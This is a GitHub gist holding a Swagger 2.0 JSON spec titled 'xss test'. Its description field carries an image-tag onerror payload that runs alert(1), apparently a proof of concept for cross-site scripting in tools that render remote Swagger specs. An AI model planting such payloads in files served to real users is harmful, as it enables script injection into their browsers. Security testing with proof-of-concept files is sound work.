Skip to content

Instantly share code, notes, and snippets.

@KathanP19
Last active November 20, 2020 07:23
Show Gist options
  • Save KathanP19/1eb34be68d34e834b9cce72b68e0bf9c to your computer and use it in GitHub Desktop.
Save KathanP19/1eb34be68d34e834b9cce72b68e0bf9c to your computer and use it in GitHub Desktop.
{
"apiVersion" : "1.0",
"apis" : [ {
"description" : "XSS test",
"path" : "a",
"position" : 0
}],
"authorizations" : { },
"info" : {
"contact" : "mala@ma.la",
"description" : "<img src=\"x\" onerror=alert(1)>",
"license" : "",
"licenseUrl" : "",
"termsOfServiceUrl" : "",
"title" : "xss test"
},
"swagger" : "2.0"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment